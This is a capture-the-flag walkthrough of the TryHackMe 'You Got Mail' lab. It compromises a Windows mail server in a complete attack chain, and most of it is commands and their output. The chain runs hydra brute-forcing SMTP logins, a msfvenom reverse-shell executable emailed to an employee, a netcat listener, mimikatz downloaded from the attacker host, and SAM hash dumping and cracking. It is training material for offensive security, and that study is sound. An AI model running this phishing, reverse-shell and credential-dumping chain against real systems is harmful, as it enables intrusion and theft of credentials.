TryHackMe - You Got Mail
Windows machine is fun as well
Introduction
Let’s step up our game and try a Medium room. We are supposed to get into the brownbrick.co website and get access via e-mail address I’m assuming.
Nmap
Let’s start with nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
nmap -T4 -n -sC -sV -Pn -p- 10.10.148.225
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: OK IMAP4rev1 IMAP4 completed CHILDREN SORT RIGHTS=texkA0001 ACL CAPABILITY IDLE QUOTA NAMESPACE
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-18T19:57:00+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=BRICK-MAIL
| Not valid before: 2025-02-17T19:53:26
|_Not valid after: 2025-08-19T19:53:26
| rdp-ntlm-info:
| Target_Name: BRICK-MAIL
| NetBIOS_Domain_Name: BRICK-MAIL
| NetBIOS_Computer_Name: BRICK-MAIL
| DNS_Domain_Name: BRICK-MAIL
| DNS_Computer_Name: BRICK-MAIL
| Product_Version: 10.0.17763
|_ System_Time: 2025-02-18T19:56:52+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-18T19:56:52
|_ start_date: N/A
A lot of open ports with mostly microsoft services
Reconnaisance
Along with the open ports we have received a website https://brownbrick.co so let’s have a visit
We can go straight to team page and we can see e-mail addresses
Let’s make a list so we can brute force later
1
2
3
4
5
6
oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co
And we can use a password list using a cewl tool from the entire website
1
$ cewl --lowercase https://brownbrick.co/ > pass.txt
Brute Force
Ok since we have our username and password list, let’s try to bruteforce the access via smtp port 587/tcp since it was open
We will use hydra since it’s the easiest one
1
hydra -L team.txt -P pass.txt 10.10.148.225 smtp -s 587
And we’ve got a hit!
1
2
[587][smtp] host: 10.10.148.225 login: lhedvig@brownbrick.co password: bricks
Since there are valid credentials, we can use those to send e-mail to other team members using metasploit(msvenom)
Let’s create a reverse shell executable so we can send it to other team members
1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.122 LPORT=1337 -f exe -o shell.exe
Let’s listen for port 1337 and send an email with our shell.exe attached
1
2
nc -lvnp 1337
listening on [any] 1337 ...
And let’s send e-mail to the first team member:
1
2
sendemail -f "lhedvig@brownbrick.co" -t "oaurelius@brownbrick.co" -u "test" -m "test" -a shell.exe -s 10.10.148.225:25 -xu "lhedvig@brownbrick.co" -xp "bricks"
Feb 18 21:22:08 kali sendemail[23334]: Email was sent successfully!
And we can see that user has already clicked on our attachment!
1
2
3
4
5
6
7
connect to [10.11.75.122] from (UNKNOWN) [10.10.148.225] 49759
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Mail\Attachments>
whoami
brick-mail\wrohit
User Flag
Flag is on the desktop of our user so let’s get it
Getting Passwords
So we will use mimikatz tool for this
We can dump hashes from windows machine so firstly, we need to get mimikatz.exe application to our target machine
Let’s start an http server on our attacker machine where the mimikatz.exe is and we serve ourselves as a download server
1
2
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
And then download the file from our machine
1
2
3
4
curl http://10.11.75.122/mimikatz.exe -o mimikatz.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1323k 100 1323k 0 0 1323k 0 0:00:01 --:--:-- 0:00:01 3393k
Now we can use mimikatz.exe to dump hashes
1
2
3
4
5
6
7
8
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
We need to elevate privileges using token::elevate
1
2
mimikatz # privilege::debug
Privilege '20' OK
And dump hashes
1
2
3
4
mimikatz # lsadump::sam
RID : 000003f6 (1014)
User : wrohit
Hash NTLM: 8458995f1d0a4b0c107fb8e23362c814
Now crack the hash using crackstation.net
And the to get the hMail password we go to
1
2
C:\Program Files (x86)\hMailServer\Bin>type hMailServer.INI
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
Crackstation again and we are done
